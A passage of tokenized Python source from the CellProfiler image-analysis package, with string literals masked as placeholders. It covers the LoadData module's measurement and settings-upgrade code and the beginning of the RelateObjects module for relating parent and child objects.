"<STR_LIT:_>" . join ( ( url_category , name ) ) <EOL> path_feature = "<STR_LIT:_>" . join ( ( path_category , name ) ) <EOL> if path_feature not in all_image_features : <EOL> path_feature = None <EOL> file_feature = "<STR_LIT:_>" . join ( ( file_category , name ) ) <EOL> if file_feature not in all_image_features : <EOL> file_feature = None <EOL> urls = m . get_measurement ( cpmeas . IMAGE , <EOL> url_feature , <EOL> image_set_number = image_numbers ) <EOL> for image_number , url in zip ( image_numbers , urls ) : <EOL> url = url . encode ( "<STR_LIT:utf-8>" ) <EOL> if url . lower ( ) . startswith ( "<STR_LIT>" ) : <EOL> fullname = url2pathname ( url ) <EOL> fullname = fn_alter_path ( fullname ) <EOL> path , filename = os . path . split ( fullname ) <EOL> url = unicode ( pathname2url ( fullname ) , "<STR_LIT:utf-8>" ) <EOL> m . add_measurement ( cpmeas . IMAGE , url_feature , url , <EOL> image_set_number = image_number ) <EOL> if file_feature is not None : <EOL> m . add_measurement ( <EOL> cpmeas . IMAGE , file_feature , <EOL> filename , <EOL> image_set_number = image_number ) <EOL> if path_feature is not None : <EOL> m . add_measurement ( <EOL> cpmeas . IMAGE , path_feature , <EOL> path , image_set_number = image_number ) <EOL> self . csv_directory . alter_for_create_batch_files ( fn_alter_path ) <EOL> self . image_directory . alter_for_create_batch_files ( fn_alter_path ) <EOL> return True <EOL> def fetch_provider ( self , name , measurements , is_image_name = True ) : <EOL> path_base = self . image_path <EOL> if is_image_name : <EOL> url_feature = C_URL + "<STR_LIT:_>" + name <EOL> series_feature = C_SERIES + "<STR_LIT:_>" + name <EOL> frame_feature = C_FRAME + "<STR_LIT:_>" + name <EOL> else : <EOL> url_feature = C_OBJECTS_URL + "<STR_LIT:_>" + name <EOL> series_feature = C_OBJECTS_SERIES + "<STR_LIT:_>" + name <EOL> frame_feature = C_OBJECTS_FRAME + "<STR_LIT:_>" + name <EOL> url = measurements . get_measurement ( cpmeas . IMAGE , url_feature ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> full_filename = url2pathname ( url ) <EOL> path , filename = os . path . split ( full_filename ) <EOL> if measurements . has_feature ( cpmeas . IMAGE , series_feature ) : <EOL> series = measurements [ cpmeas . IMAGE , series_feature ] <EOL> else : <EOL> series = None <EOL> if measurements . has_feature ( cpmeas . IMAGE , frame_feature ) : <EOL> frame = measurements [ cpmeas . IMAGE , frame_feature ] <EOL> else : <EOL> frame = None <EOL> return LoadImagesImageProvider ( <EOL> name , path , filename , <EOL> rescale = self . rescale . value and is_image_name , <EOL> series = series , <EOL> index = frame ) <EOL> def run ( self , workspace ) : <EOL> '''<STR_LIT>''' <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> image_set = workspace . image_set <EOL> object_set = workspace . object_set <EOL> statistics = [ ] <EOL> features = [ x [ <NUM_LIT:1> ] for x in <EOL> self . get_measurement_columns ( workspace . pipeline ) <EOL> if x [ <NUM_LIT:0> ] == cpmeas . IMAGE ] <EOL> if self . wants_images : <EOL> image_size = None <EOL> for image_name in self . other_providers ( '<STR_LIT>' ) : <EOL> provider = self . fetch_provider ( image_name , m ) <EOL> image_set . get_providers ( ) . append ( provider ) <EOL> image = image_set . get_image ( image_name ) <EOL> pixel_data = image . pixel_data <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_MD5_DIGEST , image_name ) ) , <EOL> provider . get_md5_hash ( m ) ) <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_SCALING , image_name ) ) , <EOL> image . scale ) <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_HEIGHT , image_name ) ) , <EOL> int ( pixel_data . shape [ <NUM_LIT:0> ] ) ) <EOL> m . add_image_measurement ( "<STR_LIT:_>" . join ( ( C_WIDTH , image_name ) ) , <EOL> int ( pixel_data . shape [ <NUM_LIT:1> ] ) ) <EOL> if image_size is None : <EOL> image_size = tuple ( pixel_data . shape [ : <NUM_LIT:2> ] ) <EOL> first_filename = image . file_name <EOL> elif tuple ( pixel_data . shape [ : <NUM_LIT:2> ] ) != image_size : <EOL> warning = bad_sizes_warning ( image_size , first_filename , <EOL> pixel_data . shape , image . file_name ) <EOL> if self . show_window : <EOL> workspace . display_data . warning = warning <EOL> else : <EOL> print warning <EOL> objects_names = self . get_object_names ( ) <EOL> for objects_name in objects_names : <EOL> provider = self . fetch_provider ( <EOL> objects_name , m , is_image_name = False ) <EOL> image = provider . provide_image ( workspace . image_set ) <EOL> pixel_data = convert_image_to_objects ( image . pixel_data ) <EOL> o = cpo . Objects ( ) <EOL> o . segmented = pixel_data <EOL> object_set . add_objects ( o , objects_name ) <EOL> I . add_object_count_measurements ( m , objects_name , o . count ) <EOL> I . add_object_location_measurements ( m , objects_name , pixel_data ) <EOL> for feature_name in sorted ( features ) : <EOL> value = m . get_measurement ( cpmeas . IMAGE , feature_name ) <EOL> statistics . append ( ( feature_name , value ) ) <EOL> if self . show_window : <EOL> workspace . display_data . statistics = statistics <EOL> def display ( self , workspace , figure ) : <EOL> if hasattr ( workspace . display_data , "<STR_LIT>" ) : <EOL> from cellprofiler . gui . errordialog import show_warning <EOL> show_warning ( "<STR_LIT>" , <EOL> workspace . display_data . warning , <EOL> cpprefs . get_show_report_bad_sizes_dlg , <EOL> cpprefs . set_show_report_bad_sizes_dlg ) <EOL> figure . set_subplots ( ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> figure . subplot_table ( <NUM_LIT:0> , <NUM_LIT:0> , workspace . display_data . statistics ) <EOL> def get_groupings ( self , workspace ) : <EOL> '''<STR_LIT>''' <EOL> if ( self . wants_images . value and <EOL> self . wants_image_groupings . value and <EOL> len ( self . metadata_fields . selections ) > <NUM_LIT:0> ) : <EOL> keys = [ "<STR_LIT:_>" . join ( ( cpmeas . C_METADATA , k ) ) <EOL> for k in self . metadata_fields . selections ] <EOL> if len ( keys ) == <NUM_LIT:0> : <EOL> return None <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> return keys , m . get_groupings ( keys ) <EOL> return None <EOL> def get_measurement_columns ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> entry = None <EOL> try : <EOL> entry = self . get_cache_info ( ) <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> return entry [ "<STR_LIT>" ] <EOL> fd = self . open_csv ( ) <EOL> reader = csv . reader ( fd ) <EOL> header = [ header_to_column ( x ) for x in reader . next ( ) ] <EOL> if header [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> reader = self . convert ( ) <EOL> header = reader . dtype . names <EOL> except : <EOL> if entry is not None : <EOL> entry [ "<STR_LIT>" ] = [ ] <EOL> return [ ] <EOL> previous_columns = pipeline . get_measurement_columns ( self ) <EOL> previous_fields = set ( [ x [ <NUM_LIT:1> ] for x in previous_columns <EOL> if x [ <NUM_LIT:0> ] == cpmeas . IMAGE ] ) <EOL> already_output = [ x in previous_fields for x in header ] <EOL> coltypes = [ cpmeas . COLTYPE_INTEGER ] * len ( header ) <EOL> for i in range ( len ( header ) ) : <EOL> if ( header [ i ] . startswith ( cpmeas . C_METADATA + "<STR_LIT:_>" ) and <EOL> cpmeas . is_well_column_token ( header [ i ] . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] ) ) : <EOL> coltypes [ i ] = cpmeas . COLTYPE_VARCHAR <EOL> if any ( [ header [ i ] . startswith ( x ) <EOL> for x in ( C_PATH_NAME , C_FILE_NAME , C_OBJECTS_FILE_NAME , <EOL> C_OBJECTS_PATH_NAME , C_URL , C_OBJECTS_URL ) ] ) : <EOL> coltypes [ i ] = cpmeas . COLTYPE_VARCHAR <EOL> collen = [ <NUM_LIT:0> ] * len ( header ) <EOL> key_is_path_or_file_name = [ <EOL> ( key . startswith ( C_PATH_NAME ) or <EOL> key . startswith ( C_FILE_NAME ) or <EOL> key . startswith ( C_OBJECTS_FILE_NAME ) or <EOL> key . startswith ( C_OBJECTS_PATH_NAME ) ) for key in header ] <EOL> key_is_path_or_url = [ <EOL> ( key . startswith ( C_PATH_NAME ) or <EOL> key . startswith ( C_OBJECTS_PATH_NAME ) or <EOL> key . startswith ( C_URL ) or <EOL> key . startswith ( C_OBJECTS_URL ) ) for key in header ] <EOL> for row in reader : <EOL> if len ( row ) > len ( header ) : <EOL> row = row [ : len ( header ) ] <EOL> for index , field in enumerate ( row ) : <EOL> if already_output [ index ] : <EOL> continue <EOL> if ( not self . wants_images ) and key_is_path_or_file_name [ index ] : <EOL> continue <EOL> try : <EOL> len_field = len ( field ) <EOL> except TypeError : <EOL> field = str ( field ) <EOL> len_field = len ( field ) <EOL> if key_is_path_or_url [ index ] : <EOL> len_field = max ( cpmeas . PATH_NAME_LENGTH , <EOL> len_field + PATH_PADDING ) <EOL> if coltypes [ index ] != cpmeas . COLTYPE_VARCHAR : <EOL> ldtype = get_loaddata_type ( field ) <EOL> if coltypes [ index ] == cpmeas . COLTYPE_INTEGER : <EOL> coltypes [ index ] = ldtype <EOL> elif ( coltypes [ index ] == cpmeas . COLTYPE_FLOAT and <EOL> ldtype != cpmeas . COLTYPE_INTEGER ) : <EOL> coltypes [ index ] = ldtype <EOL> if collen [ index ] < len ( field ) : <EOL> collen [ index ] = len ( field ) <EOL> for index in range ( len ( header ) ) : <EOL> if coltypes [ index ] == cpmeas . COLTYPE_VARCHAR : <EOL> coltypes [ index ] = cpmeas . COLTYPE_VARCHAR_FORMAT % collen [ index ] <EOL> image_names = self . other_providers ( '<STR_LIT>' ) <EOL> result = [ ( cpmeas . IMAGE , colname , coltype ) <EOL> for colname , coltype in zip ( header , coltypes ) <EOL> if colname not in previous_fields ] <EOL> if self . wants_images : <EOL> for feature , coltype in ( <EOL> ( C_URL , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_PATH_NAME , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_FILE_NAME , cpmeas . COLTYPE_VARCHAR_FILE_NAME ) , <EOL> ( C_MD5_DIGEST , cpmeas . COLTYPE_VARCHAR_FORMAT % <NUM_LIT:32> ) , <EOL> ( C_SCALING , cpmeas . COLTYPE_FLOAT ) , <EOL> ( C_HEIGHT , cpmeas . COLTYPE_INTEGER ) , <EOL> ( C_WIDTH , cpmeas . COLTYPE_INTEGER ) ) : <EOL> for image_name in image_names : <EOL> measurement = feature + '<STR_LIT:_>' + image_name <EOL> if not any ( [ measurement == c [ <NUM_LIT:1> ] for c in result ] ) : <EOL> result . append ( ( cpmeas . IMAGE , measurement , coltype ) ) <EOL> for object_name in self . get_object_names ( ) : <EOL> result += I . get_object_measurement_columns ( object_name ) <EOL> for feature , coltype in ( <EOL> ( C_OBJECTS_URL , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_OBJECTS_PATH_NAME , cpmeas . COLTYPE_VARCHAR_PATH_NAME ) , <EOL> ( C_OBJECTS_FILE_NAME , cpmeas . COLTYPE_VARCHAR_FILE_NAME ) ) : <EOL> mname = C_OBJECTS_URL + "<STR_LIT:_>" + object_name <EOL> result . append ( ( cpmeas . IMAGE , mname , coltype ) ) <EOL> well_column = None <EOL> well_row_column = None <EOL> well_col_column = None <EOL> for column in result : <EOL> if not column [ <NUM_LIT:1> ] . startswith ( cpmeas . C_METADATA + "<STR_LIT:_>" ) : <EOL> continue <EOL> category , feature = column [ <NUM_LIT:1> ] . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) <EOL> if cpmeas . is_well_column_token ( feature ) : <EOL> well_col_column = column <EOL> elif cpmeas . is_well_row_token ( feature ) : <EOL> well_row_column = column <EOL> elif feature . lower ( ) == cpmeas . FTR_WELL . lower ( ) : <EOL> well_column = column <EOL> if ( well_column is None and well_row_column is not None and <EOL> well_col_column is not None ) : <EOL> length = cpmeas . get_length_from_varchar ( well_row_column [ <NUM_LIT:2> ] ) <EOL> length += cpmeas . get_length_from_varchar ( well_col_column [ <NUM_LIT:2> ] ) <EOL> result += [ ( cpmeas . IMAGE , <EOL> '<STR_LIT:_>' . join ( ( cpmeas . C_METADATA , cpmeas . FTR_WELL ) ) , <EOL> cpmeas . COLTYPE_VARCHAR_FORMAT % length ) ] <EOL> entry [ "<STR_LIT>" ] = result <EOL> return result <EOL> def has_synthetic_well_metadata ( self ) : <EOL> '''<STR_LIT>''' <EOL> fields = self . get_header ( ) <EOL> has_well_col = False <EOL> has_well_row = False <EOL> for field in fields : <EOL> if not field . startswith ( cpmeas . C_METADATA + "<STR_LIT:_>" ) : <EOL> continue <EOL> category , feature = field . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) <EOL> if cpmeas . is_well_column_token ( feature ) : <EOL> has_well_col = True <EOL> elif cpmeas . is_well_row_token ( feature ) : <EOL> has_well_row = True <EOL> elif feature . lower ( ) == cpmeas . FTR_WELL . lower ( ) : <EOL> return False <EOL> return has_well_col and has_well_row <EOL> def get_categories ( self , pipeline , object_name ) : <EOL> try : <EOL> columns = self . get_measurement_columns ( pipeline ) <EOL> result = set ( [ column [ <NUM_LIT:1> ] . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] for column in columns <EOL> if column [ <NUM_LIT:0> ] == object_name ] ) <EOL> return list ( result ) <EOL> except : <EOL> return [ ] <EOL> def get_measurements ( self , pipeline , object_name , category ) : <EOL> columns = self . get_measurement_columns ( pipeline ) <EOL> return [ feature for c , feature in <EOL> [ column [ <NUM_LIT:1> ] . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) for column in columns <EOL> if column [ <NUM_LIT:0> ] == object_name <EOL> and column [ <NUM_LIT:1> ] . startswith ( category + "<STR_LIT:_>" ) ] ] <EOL> def change_causes_prepare_run ( self , setting ) : <EOL> '''<STR_LIT>''' <EOL> if self . wants_images or setting == self . wants_images : <EOL> return True <EOL> return False <EOL> def upgrade_settings ( self , setting_values , variable_revision_number , <EOL> module_name , from_matlab ) : <EOL> DIR_DEFAULT_IMAGE = '<STR_LIT>' <EOL> DIR_DEFAULT_OUTPUT = '<STR_LIT>' <EOL> if from_matlab and variable_revision_number == <NUM_LIT:2> : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> text_file_name = setting_values [ <NUM_LIT:0> ] <EOL> field_name = setting_values [ <NUM_LIT:1> ] <EOL> path_name = setting_values [ <NUM_LIT:2> ] <EOL> if path_name == '<STR_LIT:.>' : <EOL> path_choice = DIR_DEFAULT_IMAGE <EOL> elif path_name == '<STR_LIT:&>' : <EOL> path_choice = DIR_DEFAULT_OUTPUT <EOL> else : <EOL> path_choice = DIR_OTHER <EOL> setting_values = [ path_choice , path_name , text_file_name , <EOL> cps . NO , DIR_DEFAULT_IMAGE , '<STR_LIT:.>' , <EOL> cps . NO , "<STR_LIT>" ] <EOL> from_matlab = False <EOL> variable_revision_number = <NUM_LIT:1> <EOL> module_name = self . module_name <EOL> if ( not from_matlab ) and variable_revision_number == <NUM_LIT:1> : <EOL> setting_values = setting_values + [ cps . NO , "<STR_LIT>" ] <EOL> variable_revision_number = <NUM_LIT:2> <EOL> if variable_revision_number == <NUM_LIT:2> and ( not from_matlab ) : <EOL> if setting_values [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = [ DIR_DEFAULT_IMAGE ] + setting_values [ <NUM_LIT:1> : ] <EOL> elif setting_values [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = [ DIR_DEFAULT_OUTPUT ] + setting_values [ <NUM_LIT:1> : ] <EOL> if setting_values [ <NUM_LIT:4> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = ( setting_values [ : <NUM_LIT:4> ] + [ DIR_DEFAULT_IMAGE ] + <EOL> setting_values [ <NUM_LIT:5> : ] ) <EOL> elif setting_values [ <NUM_LIT:4> ] . startswith ( "<STR_LIT>" ) : <EOL> setting_values = ( setting_values [ : <NUM_LIT:4> ] + [ DIR_DEFAULT_OUTPUT ] + <EOL> setting_values [ <NUM_LIT:5> : ] ) <EOL> variable_revision_number = <NUM_LIT:3> <EOL> if variable_revision_number == <NUM_LIT:3> and ( not from_matlab ) : <EOL> module_name = self . module_name <EOL> if variable_revision_number == <NUM_LIT:3> and ( not from_matlab ) : <EOL> csv_directory_choice , csv_custom_directory , csv_file_name , wants_images , image_directory_choice , image_custom_directory , wants_rows , row_range , wants_image_groupings , metadata_fields = setting_values <EOL> csv_directory = cps . DirectoryPath . static_join_string ( <EOL> csv_directory_choice , csv_custom_directory ) <EOL> image_directory = cps . DirectoryPath . static_join_string ( <EOL> image_directory_choice , image_custom_directory ) <EOL> setting_values = [ <EOL> csv_directory , csv_file_name , wants_images , <EOL> image_directory , wants_rows , row_range , wants_image_groupings , <EOL> metadata_fields ] <EOL> variable_revision_number = <NUM_LIT:4> <EOL> setting_values = list ( setting_values ) <EOL> for index in ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> setting_values [ index ] = cps . DirectoryPath . upgrade_setting ( <EOL> setting_values [ index ] ) <EOL> if variable_revision_number == <NUM_LIT:4> and ( not from_matlab ) : <EOL> csv_directory , csv_file_name , wants_images , image_directory , wants_rows , row_range , wants_image_groupings , metadata_fields = setting_values <EOL> dir_choice , custom_dir = cps . DirectoryPath . split_string ( csv_directory ) <EOL> if dir_choice == cps . URL_FOLDER_NAME : <EOL> csv_file_name = custom_dir + '<STR_LIT:/>' + csv_file_name <EOL> csv_directory = cps . DirectoryPath . static_join_string ( dir_choice , '<STR_LIT>' ) <EOL> setting_values = [ <EOL> csv_directory , csv_file_name , wants_images , <EOL> image_directory , wants_rows , row_range , wants_image_groupings , <EOL> metadata_fields ] <EOL> variable_revision_number = <NUM_LIT:5> <EOL> if variable_revision_number == <NUM_LIT:5> and ( not from_matlab ) : <EOL> setting_values = setting_values + [ cps . YES ] <EOL> variable_revision_number = <NUM_LIT:6> <EOL> return setting_values , variable_revision_number , from_matlab <EOL> LoadText = LoadData <EOL> def best_cast ( sequence , coltype = None ) : <EOL> '''<STR_LIT>''' <EOL> if ( isinstance ( coltype , ( str , unicode ) ) and <EOL> coltype . startswith ( cpmeas . COLTYPE_VARCHAR ) ) : <EOL> return np . array ( sequence ) <EOL> def fn ( x , y ) : <EOL> if cpmeas . COLTYPE_VARCHAR in ( x , y ) : <EOL> return cpmeas . COLTYPE_VARCHAR <EOL> if cpmeas . COLTYPE_FLOAT in ( x , y ) : <EOL> return cpmeas . COLTYPE_FLOAT <EOL> return cpmeas . COLTYPE_INTEGER <EOL> ldtype = reduce ( fn , [ get_loaddata_type ( x ) for x in sequence ] , <EOL> cpmeas . COLTYPE_INTEGER ) <EOL> if ldtype == cpmeas . COLTYPE_VARCHAR : <EOL> return np . array ( sequence ) <EOL> elif ldtype == cpmeas . COLTYPE_FLOAT : <EOL> return np . array ( sequence , np . float64 ) <EOL> else : <EOL> return np . array ( sequence , np . int32 ) <EOL> int32_max = np . iinfo ( np . int32 ) . max <EOL> int32_min = np . iinfo ( np . int32 ) . min <EOL> def get_loaddata_type ( x ) : <EOL> '''<STR_LIT>''' <EOL> global int32_max , int32_min <EOL> try : <EOL> iv = int ( x ) <EOL> if iv > int32_max : <EOL> return cpmeas . COLTYPE_VARCHAR <EOL> if iv < int32_min : <EOL> return cpmeas . COLTYPE_VARCHAR <EOL> return cpmeas . COLTYPE_INTEGER <EOL> except : <EOL> try : <EOL> fv = float ( x ) <EOL> return cpmeas . COLTYPE_FLOAT <EOL> except : <EOL> return cpmeas . COLTYPE_VARCHAR </s>
<s> '''<STR_LIT>''' <EOL> import re <EOL> import sys <EOL> import numpy as np <EOL> import scipy . ndimage as scind <EOL> from centrosome . cpmorphology import centers_of_labels <EOL> from centrosome . cpmorphology import fixup_scipy_ndimage_result as fix <EOL> from centrosome . outline import outline <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . settings as cps <EOL> from cellprofiler . modules . identify import C_PARENT , C_CHILDREN , R_PARENT , R_CHILD <EOL> from cellprofiler . modules . identify import FF_PARENT , FF_CHILDREN_COUNT <EOL> from cellprofiler . modules . identify import M_LOCATION_CENTER_X , M_LOCATION_CENTER_Y , M_NUMBER_OBJECT_NUMBER <EOL> from cellprofiler . settings import YES , NO <EOL> D_NONE = "<STR_LIT:None>" <EOL> D_CENTROID = "<STR_LIT>" <EOL> D_MINIMUM = "<STR_LIT>" <EOL> D_BOTH = "<STR_LIT>" <EOL> D_ALL = [ D_NONE , D_CENTROID , D_MINIMUM , D_BOTH ] <EOL> C_MEAN = "<STR_LIT>" <EOL> FF_MEAN = '<STR_LIT>' % C_MEAN <EOL> '''<STR_LIT>''' <EOL> C_DISTANCE = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> FEAT_CENTROID = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> FEAT_MINIMUM = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> FF_CENTROID = '<STR_LIT>' % ( C_DISTANCE , FEAT_CENTROID ) <EOL> '''<STR_LIT>''' <EOL> FF_MINIMUM = '<STR_LIT>' % ( C_DISTANCE , FEAT_MINIMUM ) <EOL> FIXED_SETTING_COUNT = <NUM_LIT:5> <EOL> VARIABLE_SETTING_COUNT = <NUM_LIT:1> <EOL> class RelateObjects ( cpm . CPModule ) : <EOL> module_name = '<STR_LIT>' <EOL> category = "<STR_LIT>" <EOL> variable_revision_number = <NUM_LIT:2> <EOL> def create_settings ( self ) : <EOL> self . sub_object_name = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , cps . NONE , doc = """<STR_LIT>""" ) <EOL> self . parent_name = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , <EOL> cps . NONE , doc = """<STR_LIT>""" ) <EOL> self . find_parent_child_distances = cps . Choice ( <EOL> "<STR_LIT>" , <EOL> D_ALL , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . wants_step_parent_distances = cps . Binary ( <EOL> "<STR_LIT>" , False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . step_parent_names = [ ] <EOL> self . add_step_parent ( can_delete = False ) <EOL> self . add_step_parent_button = cps . DoSomething ( "<STR_LIT>" , "<STR_LIT>" , <EOL> self . add_step_parent ) <EOL> self . wants_per_parent_means = cps . Binary ( <EOL> '<STR_LIT>' , <EOL> False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> def add_step_parent ( self , can_delete = True ) : <EOL> group = cps . SettingsGroup ( ) <EOL> group . append ( "<STR_LIT>" , cps . Choice ( <EOL> "<STR_LIT>" , [ cps . NONE ] , <EOL> choices_fn = self . get_step_parents , doc = """<STR_LIT>""" ) ) <EOL> if can_delete : <EOL> group . append ( "<STR_LIT>" , cps . RemoveSettingButton ( <EOL> "<STR_LIT>" , "<STR_LIT>" , self . step_parent_names , group ) ) <EOL> self . step_parent_names . append ( group ) <EOL> def get_step_parents ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> step_parents = set ( ) <EOL> parent_name = self . parent_name . value <EOL> for module in pipeline . modules ( ) : <EOL> if module . module_num == self . module_num : <EOL> return list ( step_parents ) <EOL> grandparents = module . get_measurements ( pipeline , parent_name , <EOL> C_PARENT ) <EOL> step_parents . update ( grandparents ) <EOL> siblings = module . get_measurements ( pipeline , parent_name , <EOL> C_CHILDREN ) <EOL> for sibling in siblings : <EOL> match = re . match ( "<STR_LIT>" , sibling ) <EOL> if match is not None : <EOL> sibling_name = match . groups ( ) [ <NUM_LIT:0> ] <EOL> if parent_name in module . get_measurements ( pipeline , <EOL> sibling_name , <EOL> C_PARENT ) : <EOL> step_parents . add ( sibling_name ) <EOL> return list ( step_parents ) <EOL> @ property <EOL> def has_step_parents ( self ) : <EOL> '''<STR_LIT>''' <EOL> return ( len ( self . step_parent_names ) > <NUM_LIT:0> and <EOL> len ( self . step_parent_names [ <NUM_LIT:0> ] . step_parent_name . choices ) > <NUM_LIT:0> ) <EOL> def settings ( self ) : <EOL> result = [ self . sub_object_name , self . parent_name , <EOL> self . find_parent_child_distances , self . wants_per_parent_means , <EOL> self . wants_step_parent_distances ] <EOL> result += [ group . step_parent_name for group in self . step_parent_names ] <EOL> return result <EOL> def visible_settings ( self ) : <EOL> result = [ self . sub_object_name , self . parent_name , <EOL> self . wants_per_parent_means , <EOL> self . find_parent_child_distances ] <EOL> if ( self . find_parent_child_distances != D_NONE and <EOL> self . has_step_parents ) : <EOL> result += [ self . wants_step_parent_distances ] <EOL> if self . wants_step_parent_distances : <EOL> for group in self . step_parent_names : <EOL> result += group . visible_settings ( ) <EOL> result += [ self . add_step_parent_button ] <EOL> return result <EOL> def run ( self , workspace ) : <EOL> parents = workspace . object_set . get_objects ( self . parent_name . value ) <EOL> children = workspace . object_set . get_objects ( self . sub_object_name . value ) <EOL> child_count , parents_of = parents . relate_children ( children ) <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> m . add_measurement ( self . sub_object_name . value , <EOL> FF_PARENT % self . parent_name . value , <EOL> parents_of ) <EOL> m . add_measurement ( self . parent_name . value , <EOL> FF_CHILDREN_COUNT % self . sub_object_name . value , <EOL> child_count ) <EOL> good_parents = parents_of [ parents_of != <NUM_LIT:0> ] <EOL> image_numbers = np . ones ( len ( good_parents ) , int ) * m . image_set_number <EOL> good_children = np . argwhere ( parents_of != <NUM_LIT:0> ) . flatten ( ) + <NUM_LIT:1> <EOL> if np . any ( good_parents ) : <EOL> m . add_relate_measurement ( self . module_num , <EOL> R_PARENT , <EOL> self . parent_name . value , <EOL> self . sub_object_name . value , <EOL> image_numbers , <EOL> good_parents , <EOL> image_numbers , <EOL> good_children ) <EOL> m . add_relate_measurement ( self . module_num , <EOL> R_CHILD , <EOL> self . sub_object_name . value , <EOL> self . parent_name . value , <EOL> image_numbers , <EOL> good_children , <EOL> image_numbers , <EOL> good_parents ) <EOL> parent_names = self . get_parent_names ( ) <EOL> for parent_name in parent_names : <EOL> if self . find_parent_child_distances in ( D_BOTH , D_CENTROID ) : <EOL> self . calculate_centroid_distances ( workspace , parent_name ) <EOL> if self . find_parent_child_distances in ( D_BOTH , D_MINIMUM ) : <EOL> self . calculate_minimum_distances ( workspace , parent_name ) <EOL> if self . wants_per_parent_means . value : <EOL> parent_indexes = np . arange ( np . max ( parents . segmented ) ) + <NUM_LIT:1> <EOL> for feature_name in m . get_feature_names ( self . sub_object_name . value ) : <EOL> if not self . should_aggregate_feature ( feature_name ) : <EOL> continue <EOL> data = m . get_current_measurement ( self . sub_object_name . value , <EOL> feature_name ) <EOL> if data is not None and len ( data ) > <NUM_LIT:0> : <EOL> if len ( parents_of ) > <NUM_LIT:0> : <EOL> means = fix ( scind . mean ( data . astype ( float ) , <EOL> parents_of , parent_indexes ) ) <EOL> else : <EOL> means = np . zeros ( ( <NUM_LIT:0> , ) ) <EOL> else : <EOL> means = np . ones ( len ( parents_of ) ) * np . nan <EOL> mean_feature_name = FF_MEAN % ( self . sub_object_name . value , <EOL> feature_name ) <EOL> m . add_measurement ( self . parent_name . value , mean_feature_name , <EOL> means ) <EOL> if self . show_window : <EOL> workspace . display_data . parent_labels = parents . segmented <EOL> workspace . display_data . parent_count = parents . count <EOL> workspace . display_data . child_labels = children . segmented <EOL> workspace . display_data . parents_of = parents_of <EOL> def display ( self , workspace , figure ) : <EOL> if not self . show_window : <EOL> return <EOL> from cellprofiler . gui . cpfigure_tools import renumber_labels_for_display <EOL> figure . set_subplots ( ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> renumbered_parent_labels = renumber_labels_for_display ( <EOL> workspace . display_data . parent_labels ) <EOL> child_labels = workspace . display_data . child_labels <EOL> parents_of = workspace . display_data . parents_of <EOL> mapping = np . arange ( workspace . display_data . parent_count + <NUM_LIT:1> ) <EOL> mapping [ workspace . display_data . parent_labels . flatten ( ) ] = renumbered_parent_labels . flatten ( ) <EOL> parent_labeled_children = np . zeros ( child_labels . shape , int ) <EOL> mask = child_labels > <NUM_LIT:0> <EOL> parent_labeled_children [ mask ] = mapping [ parents_of [ child_labels [ mask ] - <NUM_LIT:1> ] ] <EOL> figure . subplot_imshow_labels ( <EOL> <NUM_LIT:0> , <NUM_LIT:0> , renumbered_parent_labels , <EOL> title = self . parent_name . value , <EOL> renumber = False ) <EOL> figure . subplot_imshow_labels ( <EOL> <NUM_LIT:1> , <NUM_LIT:0> , child_labels , <EOL> title = self . sub_object_name . value , <EOL> sharex = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> sharey = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> figure . subplot_imshow_labels ( <EOL> <NUM_LIT:0> , <NUM_LIT:1> , parent_labeled_children , <EOL> "<STR_LIT>" % <EOL> ( self . sub_object_name . value , <EOL> self . parent_name . value ) , <EOL> renumber = False , <EOL> sharex = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> sharey = figure . subplot ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> def get_parent_names ( self ) : <EOL> '''<STR_LIT>''' <EOL> parent_names = [ self . parent_name . value ] <EOL> if self . wants_step_parent_distances . value : <EOL> parent_names += [ group . step_parent_name . value <EOL> for group in self . step_parent_names ] <EOL> return parent_names <EOL> def calculate_centroid_distances ( self , workspace , parent_name ) : <EOL> '''<STR_LIT>''' <EOL> meas = workspace . measurements <EOL> assert isinstance ( meas , cpmeas . Measurements ) <EOL> sub_object_name = self . sub_object_name . value <EOL> parents = workspace . object_set . get_objects ( parent_name ) <EOL> children = workspace . object_set . get_objects ( sub_object_name ) <EOL> parents_of = self . get_parents_of ( workspace , parent_name ) <EOL> pcenters = 